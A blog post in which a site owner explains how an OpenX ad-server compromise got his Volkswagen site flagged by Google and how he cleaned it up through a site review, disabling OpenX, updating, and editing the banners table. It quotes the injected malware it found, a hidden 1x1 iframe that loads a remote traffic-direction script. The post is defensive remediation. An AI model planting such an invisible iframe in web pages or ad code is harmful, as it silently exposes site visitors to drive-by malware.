OpenX Malware, Fix “Suspected Attack Site”
I have been using OpenX for a few years to serve banner ad’s on my Volkswagen website. OpenX has always been difficult to setup. Difficult, you know, like selling karaoke to Japan. Yes, that difficult. The interface isn’t intuitive for new users and getting a grasp on how everything ties together is a nightmare that even Freddy wouldn’t want. But that’s a different blog post.
About a month ago, I woke up in the morning and grabbed my trusty iPad to make sure none of my sites blew up during the 3 hours of sleep I usually get. Everything seemed fine. After visiting my “wake-up sites” (mostly porn), I went to my laptop and opened Firefox.
I see this:
Oh shit. This is every Administrators bad dream. Panic follows pretty quickly and you start to wonder what the hell happened. “Do I have a backup? Was I hacked? I hope all my data is there”.
Just tell me how I fix this
You don’t like my stories? Fine.
1) Request a review of your site
Click the “request a review” button. This will tell you a few key pieces of information. First, it showed that the malware was linked from two sites. GenerationMediaGroup and some crazy IP address that I’ve never seen before. Instantly I knew it had to be a hack in OpenX, as the only way GenerationDUB and GenerationMediaGroup connect is via this piece of software. This might not be the case for you if you are hosting OpenX on the same server as your site, but it will at least give you an idea of what to look for.
2) Disable OpenX
Turn off OpenX immediately. The longer you are a suspected attack site the more users you could infect, the worse your ranking gets on Google and the less trusted your site becomes. Your first and most important task is to disable or remove the infected piece of your site, and get it running again so that Google knows you have fixed it. We will worry about fixing / updating OpenX later.
3) Google Webmaster Tools
You might find the code in a matter of minutes, or you could spend hours searching every PHP / ASPX file on your server. Fortunately for me (and you, if you are using OpenX), the malware code disappears after you disable OpenX.
After you have removed the piece of code that is causing the issue, go to Google Webmaster Tools. This is the only way to quickly get your site removed from the “attackers” list. Sign up if you don’t have an account and add your website.
Click the diagnostics tab, then click malware.
In here you will be able to scan your site and make sure the code is gone. After a few hours, Google will restore your site status to normal and you’re users hopefully didn’t notice.
Ok, I’ve done all that. How do I get OpenX working again?
The first thing you will find when you search this problem, is that installing the latest update of OpenX will solve your issue.
1) Download OpenX and follow their update instructions to the LETTER.
2) Manually edit your database.
Open MySQL and open your OpenX database. You can use PhpMYAdmin for this, but I am using the MySQL Query Browser for Windows.
Open the “Banners” table and run a select statement to return all of your banner ad’s. If you prefixed your tables with something like “openx_”, then modify the select statement accordingly.
SELECT * FROM banners
Well look at that! The same IP address that is listed as the site serving the malware! Looks like a sneaky attack that has hidden an IFRAME (inline frame) in your banners. Now all you have to do is remove the IFRAME code and leave your regular code!
<IFRAME src=“http://18.104.22.168/tds/in.cgi?default” width=“1” height=“1” hspace=“0” vspace=“0” frameborder=“0” scrolling=“no”></IFRAME>
Thats it! You’re all done and OpenX is ready to be enabled again. Sometimes it’s impossible to avoid these types of injections, but to stay on the safe side, make sure you up date with ALL of your open source products, OpenX, WordPress, etc. It’s best to sign up to the software providers mailing list so that you know when there are security issues that need to be addressed.
If you have any questions, the comment section is below.